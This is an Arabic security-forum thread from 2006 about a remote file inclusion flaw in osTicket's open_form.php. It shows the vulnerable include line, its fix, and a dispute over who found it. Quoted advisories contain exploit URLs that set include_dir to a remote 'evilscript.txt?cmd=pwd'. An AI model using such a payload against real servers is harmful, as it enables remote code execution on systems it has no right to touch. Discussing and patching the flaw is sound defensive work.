بحث متقدم | التسجيل
الويب العربي
  تسجيل دخول
 
   
   

  ملاحظة
الموقع متاح للإطلاع والقراءة فقط، المشاركة والمواضيع الجديدة غير متاحة حالياً لحين تطوير الموقع.




الموقع متاح للإطلاع والقراءة فقط، المشاركة والمواضيع الجديدة غير متاحة حالياً لحين تطوير الموقع.

عـودة للخلف   الويب العربي المركز التعليمي المجاني أمن المعلومات

أمن المعلومات مقالات, أخبار, مواضيع حول أمن المعلومات, وحماية أنظمة التشغيل, الشبكات, المواقع, البيانات السرية.

موضوع مغلق اضف موضوع جديد
 
خيارات الموضوع طريقة العرض
  #1  
قديم 14-10-2006, 09:07 PM
Speedhosting.info Speedhosting.info غير متصل
عضو
 
تاريخ التسجيل: May 2006
مشاركة: 36
مستوى تقييم العضوية: 0
Speedhosting.info is on a distinguished road
الافتراضي ثغره سكرب الدعم الفني عن طريق التذاكر osTicket

بسم الله الرحمن الرحيم
=-=-=-=-=-=-=-=-=
السكرب المصاب :- osTicket, Open Source Support Ticket System
وهو مستخدم في معظم الموقع العربيه
موقع الشركه :- http://www.osticket.com
نوع الثغره :- Remote File Inclusion خطيره جداا
مكتشف الثغره :- rUnViRuS
موقع :- http://www.sec-area.com/
=-=-=-=-=-=-=-=-=-=-=-=-=
ملف الثغر :- open_form.php
موجود في ملف include
الكود المصاب :-
كود:
 <? include("$include_dir/form.php"); ?>
الترقيع :-
كود:
 <? include("include/form.php"); ?>
وينصح مسح السكرب كامل او التغير الي الصادره الحديثه

تحيات
Speedhosting.info






التوقيع
موقع الشركة : http://www.speedhosting.info/
بريد : u6q@hotmail.com-
الجــــوال : 0020123445090
  #2  
قديم 15-10-2006, 01:01 AM
mr_sultan mr_sultan غير متصل
عضو
 
تاريخ التسجيل: Jul 2004
مشاركة: 10
مستوى تقييم العضوية: 0
mr_sultan is on a distinguished road
الافتراضي

انت حاط المكتشف rUnViRuS ليش تكذب

الثغره قديمه مره ولها خمسة شهور واللي مكتشفها فريق سايت داون : سويت ديفل وبلاك كود
الثغره بتاريخ : 30 / 5 / 2006 م
إسم السكربت : osticket
الإصدار : Support cards v1
نسبة الخطوره : عالية جدا
المكتشف
( team : site-down ( SwEET-DeViL & BlaCK-CoDE



وهذا الاثبات
رسالة ارسلة مواقع السكورتي

http://www.securityfocus.com/archive/1/435413

وهذا مكتشف الثغره طارحها بنفسها

http://www.lezr.com/vb/showthread.php?t=13774

يعني اذا بتكتب مره ثانيه اكتب الحقائق






آخر تعديل بواسطة mr_sultan ، 15-10-2006 الساعة 01:03 AM.
  #3  
قديم 16-10-2006, 04:21 AM
Speedhosting.info Speedhosting.info غير متصل
عضو
 
تاريخ التسجيل: May 2006
مشاركة: 36
مستوى تقييم العضوية: 0
Speedhosting.info is on a distinguished road
الافتراضي

يا اخي الثغره برده rUnViRuS منزله في سكيروتي فوكس وانا لم اري غير rUnViRuS في سكيروتي فوكس من كام يوم






التوقيع
موقع الشركة : http://www.speedhosting.info/
بريد : u6q@hotmail.com-
الجــــوال : 0020123445090
  #4  
قديم 16-10-2006, 04:33 AM
mr_sultan mr_sultan غير متصل
عضو
 
تاريخ التسجيل: Jul 2004
مشاركة: 10
مستوى تقييم العضوية: 0
mr_sultan is on a distinguished road
الافتراضي

شوف مقارنه بين تاريخ الاكتشافين....

أولا : فريق team : site-down

كود PHP:
file include exploit in Support Cards v1 May 30 2006 08:26PM
black code 
(black-cod3 hotmail com
file include exploit in Support Cards v1

forum type 
Support cards v1
bug found by 
sweet-devil
team 
site-down
type 
file include

####################################################
exploit :

http://www.example.com/support/include/open_form.php?include_dir=http://
ursite/evilscript.txt?cmd=pwd

####################################################

#######################
emails:

black-cod3 (athotmail (dotcom [email concealed] & gamr-14 (athotmail (dotcom [email concealed]
#######################

All my respect to our friends lezr.com g123g.net

done 
.. peace 


ولو تلاحظ تاريخ الإكتشاف May 30 2006 08:26PM يعني 30 / 5 / 2006 ونحن الآن في 14 / 10 /2006


ام بنسبة للأخ rUnViRuS

كود PHP:
WDT:- osTicket File Include all V Oct 14 2006 12:26AM
stormhacker hotmail com 
script
:- osTicket Open Source Support Ticket System
site
:- http://www.osticket.com

exploit by runvirus
http
://www.host/path/include/open_form.php?include_dir=

welcome in www.sec-area.com 
ولو تلاحظ تاريخ الإكتشاف أمس بالصباح الساعه 12 14 / 10 /2006 فرق شاسع بين الإكتشاف الأول واالثاني





  #5  
قديم 02-11-2006, 06:40 AM
الصورة الشخصية لـ AlwAdy4HosT
AlwAdy4HosT AlwAdy4HosT غير متصل
عضو
 
تاريخ التسجيل: Jun 2005
مشاركة: 297
مستوى تقييم العضوية: 20
AlwAdy4HosT is on a distinguished road
الافتراضي

يا عررررب الامر ماهو حرب سواء ده او ده المهم في الاخر انها ثغره ويجب ترقيعها :d
خلى عقلك اكبر من كده
جزاكم الله خير






التوقيع
شركة الوادي هوست لإستضافة والتصميم
عروض شات تبدأ من80ريال سنوي !
عروض ريسيلر تبدأ من 200ريال سنوي !!
عروض استضافة تبدأ من100ريال سنوي !!
WWW.ALWADY4HOST.COM
MSN:info@alwady4host.com
  #6  
قديم 11-02-2007, 11:55 PM
mazahm mazahm غير متصل
عضو
 
تاريخ التسجيل: Dec 2006
مشاركة: 35
مستوى تقييم العضوية: 0
mazahm is on a distinguished road
الافتراضي

تم ترقيع؟؟؟؟؟؟؟؟؟؟؟؟





موضوع مغلق




قوانين المشاركة
لا يمكنك إضافة موضوع جديد
لا يمكنك الرد على المواضيع
لا يمكنك إضافة مرفقات
لا يمكنك تعديل مشاركاتك

كود vB متاح
كود [IMG] متاح
كود HTML مغلق
إنتقل إلى

مواضيع مشابهة
الموضوع الكاتب القسم مشاركة آخر مشاركة
مشكلة التاريخ في سكريبت الدعم الفني osticket DoDoo تطويرالمواقع 4 08-06-2007 10:14 AM
عروض الدعم الفنى من شركة الدعم العربى لخدمات الاستضاف speed2host طلبات عملاء الشركات الرسمية 0 15-05-2007 02:25 PM
أريد سكريبت الدعم الفنى بنظام التذاكر ... SHARK_EGYPT تطويرالمواقع 0 21-04-2007 05:08 PM
لـawt - ::> تعريب سكربت التذاكر للدعم الفني الجديد <:: من السكربت العربي السكربت العربي التجارة الالكترونية 16 11-08-2006 06:41 PM
[ثغره] جديده في نسخ 3.5.4 وفي سكربت تذاكر الدعم الفني جديده NogomHost قسم المنتديات 3 21-05-2006 01:27 PM


جميع الأوقات بتوقيت مكة المكرمة. الساعة الآن » 02:14 AM.

Powered by vBulletin
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.


 
 »  خدمات البرمجة   »  رئيسية الدليل
  »  خدمات التصميم   »  الأمن والحماية
  »  الدعاية والتسويق
  »  الدعم والتطوير
  »  الشركات الرسمية
  »  حجز دومينات
  »  خدمات الإستضافة
 
 
  »  مكتبة الإستايلات   »  رئيسية المكتبة
  »  أكواد برمجية   »  أدوات الويب ماسترز
  »  مكتبة الهاكات   »  أدوات المصممين
  »  سكربتات متنوعة
  »  مجلات إلكترونية
  »  بلوكات متنوعة
  »  ثيمات مختلفة
 
 

صحيفة متخصصة في متابعة أخبار وجديد الإنترنت العربي
والحوارات الصحفية ومعلومات تقنية متنوعة .

   
 
 

للتواصل مع فريق عمل الويب العربي
يمكنك ذالك من خلال مركز الدعم والمساندة.

 الدعم الفني |  اعتماد العضويات |  قوانين الإنتساب |  إتفاقية الإستخدام |  أهداف الويب العربي |  دليل الشركات |  مكتبة الويب |  صحيفة الويب العربي |  الرئيسية